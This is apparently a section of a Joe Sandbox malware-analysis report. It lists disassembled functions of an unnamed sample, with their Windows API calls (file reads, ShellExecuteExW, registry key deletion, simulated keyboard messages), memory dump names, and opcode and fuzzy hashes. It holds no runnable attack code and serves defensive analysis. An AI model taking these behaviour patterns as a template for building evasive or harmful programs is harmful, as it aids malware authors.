                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1422805418-0
                                                                                                                              • Opcode ID: 3a64336803dbf917521cd4fd8dad0bde70c80578e58cff3076be41b564eb3da5
                                                                                                                              • Instruction ID: 4301aedbfeeb1985b188e243921c8d5a7f55a286bb27f36ea52e3ebce9452abd
                                                                                                                              • Opcode Fuzzy Hash: 3a64336803dbf917521cd4fd8dad0bde70c80578e58cff3076be41b564eb3da5
                                                                                                                              • Instruction Fuzzy Hash: 31414771E042159BEF14DFA8FAC83ACB7A4BF55735F118318E425AB2D1C7749841CB91
                                                                                                                              Function 001BA1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 001BA1CE
                                                                                                                                • Part of subcall function 0019010A: std::exception::exception.LIBCMT ref: 0019013E
                                                                                                                                • Part of subcall function 0019010A: __CxxThrowException@8.LIBCMT ref: 00190153
                                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001BA205
                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 001BA221
                                                                                                                              • _memmove.LIBCMT ref: 001BA26F
                                                                                                                              • _memmove.LIBCMT ref: 001BA28C
                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 001BA29B
                                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 001BA2B0
                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 001BA2CF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 256516436-0
                                                                                                                              • Opcode ID: a23a824bfbfd4dff170a0e044a5b0f00b31a43b88025f27bf45c9ca44a3e2ace
                                                                                                                              • Instruction ID: 6dad54a1e2e68b239293bc94189c16b8bf290f20b9731f8ba8bae91a552b855a
                                                                                                                              • Opcode Fuzzy Hash: a23a824bfbfd4dff170a0e044a5b0f00b31a43b88025f27bf45c9ca44a3e2ace
                                                                                                                              • Instruction Fuzzy Hash: E6316F31A00105EFCF01EFA5DC85AAEB7B9EF49310B5480A5F904AB256DB70DA55CBA1
                                                                                                                              Function 001D8CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 001D8CF3
                                                                                                                              • GetDC.USER32(00000000), ref: 001D8CFB
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001D8D06
                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 001D8D12
                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 001D8D4E
                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001D8D5F
                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 001D8D99
                                                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001D8DB9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3864802216-0
                                                                                                                              • Opcode ID: 760b55318731a20bb29d666bc87c122942b7f18bd640619afd3fd49855ae4f24
                                                                                                                              • Instruction ID: 62d18e1f98a94846c85223362f66c3dbb92e533d1a92c1115af0f07b69e5c043
                                                                                                                              • Opcode Fuzzy Hash: 760b55318731a20bb29d666bc87c122942b7f18bd640619afd3fd49855ae4f24
                                                                                                                              • Instruction Fuzzy Hash: E2315A72201614BBEB108F509C8AFFA3BAAEF49765F044055FE08DA291CB759881CB60
                                                                                                                              Function 001C1BFA Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                                • Part of subcall function 00173BCF: _wcscpy.LIBCMT ref: 00173BF2
                                                                                                                              • _wcstok.LIBCMT ref: 001C1D6E
                                                                                                                              • _wcscpy.LIBCMT ref: 001C1DFD
                                                                                                                              • _memset.LIBCMT ref: 001C1E30
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                              • String ID: X$t:"p:"
                                                                                                                              • API String ID: 774024439-221402397
                                                                                                                              • Opcode ID: efbbebe2cbbb9d910a46dd42477fd2850605147d80f9d1824cf6864f3b1d5248
                                                                                                                              • Instruction ID: d1b9126442e3750403f55245ef4b6323a76fa43ce8a4f8d569f897b705dc4def
                                                                                                                              • Opcode Fuzzy Hash: efbbebe2cbbb9d910a46dd42477fd2850605147d80f9d1824cf6864f3b1d5248
                                                                                                                              • Instruction Fuzzy Hash: CBC14F31504301AFC714EF64C895EAAB7F4BFA5310F14892DF89A972A2DB70ED45CB92
                                                                                                                              Function 0018B40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3a62d928cfdc3e112fc99c382a71be761ab1a9884068d58860885a44eabb2472
                                                                                                                              • Instruction ID: a040d82f81b247ad98043594722319f766a5427a5b3728634c2f1fc73901c515
                                                                                                                              • Opcode Fuzzy Hash: 3a62d928cfdc3e112fc99c382a71be761ab1a9884068d58860885a44eabb2472
                                                                                                                              • Instruction Fuzzy Hash: E5715A71904509EFCB04DF98CC89ABEBF79FF85314F248159F916AA251C734AA42CFA0
                                                                                                                              Function 001D2121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001D214B
                                                                                                                              • _memset.LIBCMT ref: 001D2214
                                                                                                                              • ShellExecuteExW.SHELL32(?), ref: 001D2259
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                                • Part of subcall function 00173BCF: _wcscpy.LIBCMT ref: 00173BF2
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 001D2320
                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 001D232F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 4082843840-2766056989
                                                                                                                              • Opcode ID: c2e57d194817723238bc68bce2b5326ad0332b6a4277b1ebdb713d86e1097e85
                                                                                                                              • Instruction ID: 09ea355a8b2ee3b466fa1ae739014cb692a4a6e808b5a318b037b9ff6d81a767
                                                                                                                              • Opcode Fuzzy Hash: c2e57d194817723238bc68bce2b5326ad0332b6a4277b1ebdb713d86e1097e85
                                                                                                                              • Instruction Fuzzy Hash: E1718F71A00619EFCF05EFA4D9959AEB7F5FF58310F10805AE85AAB351DB34AE40CB90
                                                                                                                              Function 001B47DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetParent.USER32(?), ref: 001B481D
                                                                                                                              • GetKeyboardState.USER32(?), ref: 001B4832
                                                                                                                              • SetKeyboardState.USER32(?), ref: 001B4893
                                                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 001B48C1
                                                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 001B48E0
                                                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 001B4926
                                                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001B4949
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 87235514-0
                                                                                                                              • Opcode ID: 169d59be80f59e8223c5c9081844de65383fd689c78744557f10493a874824f5
                                                                                                                              • Instruction ID: 39858014ba796a488ef57a5751f607314bde901d1e2135c1ab3998f75d21af93
                                                                                                                              • Opcode Fuzzy Hash: 169d59be80f59e8223c5c9081844de65383fd689c78744557f10493a874824f5
                                                                                                                              • Instruction Fuzzy Hash: F251A0A0A087D53EFB3646648C45BFBBFA95B0A308F08C589E1D5568C3C7D8EC88D751
                                                                                                                              Function 001B45F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetParent.USER32(00000000), ref: 001B4638
                                                                                                                              • GetKeyboardState.USER32(?), ref: 001B464D
                                                                                                                              • SetKeyboardState.USER32(?), ref: 001B46AE
                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 001B46DA
                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 001B46F7
                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001B473B
                                                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001B475C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 87235514-0
                                                                                                                              • Opcode ID: 52c3f57e71f7cca84ce000b594bad1841f017f05dadae7ebca1a74594b30b99b
                                                                                                                              • Instruction ID: dbbb1e1276a60a8b71268dd9b3487514531c52640e9e62c3e479eb8bd82c490f
                                                                                                                              • Opcode Fuzzy Hash: 52c3f57e71f7cca84ce000b594bad1841f017f05dadae7ebca1a74594b30b99b
                                                                                                                              • Instruction Fuzzy Hash: 7151B1A05047D63FFB3687248C55BFABFA96B06304F08C489E1D58A8C3D794EC98D761
                                                                                                                              Function 001B86AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcsncpy$LocalTime
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2945705084-0
                                                                                                                              • Opcode ID: 092ca5479c9032b19deae160cb6b3d887da84f1942182c390957e5f8e5300447
                                                                                                                              • Instruction ID: 63b009881696a333c679ffce5f191abff56afc2c8f0051319eecfc711cf065ec
                                                                                                                              • Opcode Fuzzy Hash: 092ca5479c9032b19deae160cb6b3d887da84f1942182c390957e5f8e5300447
                                                                                                                              • Instruction Fuzzy Hash: 54411C65C1021476CF11EBB4C886ADEB7BCAF15710F608866E958F3222EB30E655C7E5
                                                                                                                              Function 001D9D97 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001D9DB0
                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001D9E57
                                                                                                                              • IsMenu.USER32(?), ref: 001D9E6F
                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001D9EB7
                                                                                                                              • DrawMenuBar.USER32 ref: 001D9ED0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 3866635326-4108050209
                                                                                                                              • Opcode ID: 786656079bd30beb76fe0a67a1f197b5519c1446718ae596e801a946c793f845
                                                                                                                              • Instruction ID: 817dc048ece033e20ec0aa2da06c849b46861baa8986f3b25c6d8cffb300c694
                                                                                                                              • Opcode Fuzzy Hash: 786656079bd30beb76fe0a67a1f197b5519c1446718ae596e801a946c793f845
                                                                                                                              • Instruction Fuzzy Hash: D8411775A00209EFDB20DF59E884EAABBF5FF09354F04812AE9559B350D730ED54CB60
                                                                                                                              Function 001D3C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 001D3C92
                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001D3CBC
                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 001D3D71
                                                                                                                                • Part of subcall function 001D3C63: RegCloseKey.ADVAPI32(?), ref: 001D3CD9
                                                                                                                                • Part of subcall function 001D3C63: FreeLibrary.KERNEL32(?), ref: 001D3D2B
                                                                                                                                • Part of subcall function 001D3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 001D3D4E
                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 001D3D16
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 395352322-0
                                                                                                                              • Opcode ID: d1617c5e04354902365a3892f8b864bbf6d8ece022672abdd02eed1eb313c270
                                                                                                                              • Instruction ID: fc7fed30d8c4b7623e4a49858f5d784c7f21e7e9f608efedbde5b627e29762bb
                                                                                                                              • Opcode Fuzzy Hash: d1617c5e04354902365a3892f8b864bbf6d8ece022672abdd02eed1eb313c270
                                                                                                                              • Instruction Fuzzy Hash: 463109B1911209BFDB159BD4DC89AFEB7BDEF08300F50056AE522E2250DB709F89DB61
                                                                                                                              Function 001D8DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 001D8DF4
                                                                                                                              • GetWindowLongW.USER32(013EA668,000000F0), ref: 001D8E27
                                                                                                                              • GetWindowLongW.USER32(013EA668,000000F0), ref: 001D8E5C
                                                                                                                              • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001D8E8E
                                                                                                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001D8EB8
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 001D8EC9
                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001D8EE3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LongWindow$MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2178440468-0
                                                                                                                              • Opcode ID: 7acc29934fb4fd7b5753be9d3a552d0593106def4f2973be672d00cede619ff7
                                                                                                                              • Instruction ID: 469637d3a0eb5d7f0498b1d0cc9f7f8e4c07b2c6aac15b4fa9b3cdc84f74b09d
                                                                                                                              • Opcode Fuzzy Hash: 7acc29934fb4fd7b5753be9d3a552d0593106def4f2973be672d00cede619ff7
                                                                                                                              • Instruction Fuzzy Hash: 95310231600211EFEB21DF59EC89F6537A6FB4A724F1941A6F505CB2B2CB71A890DF41
                                                                                                                              Function 001B16F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B1734
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B175A
                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 001B175D
                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 001B177B
                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 001B1784
                                                                                                                              • StringFromGUID2.COMBASE(?,?,00000028), ref: 001B17A9
                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 001B17B7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
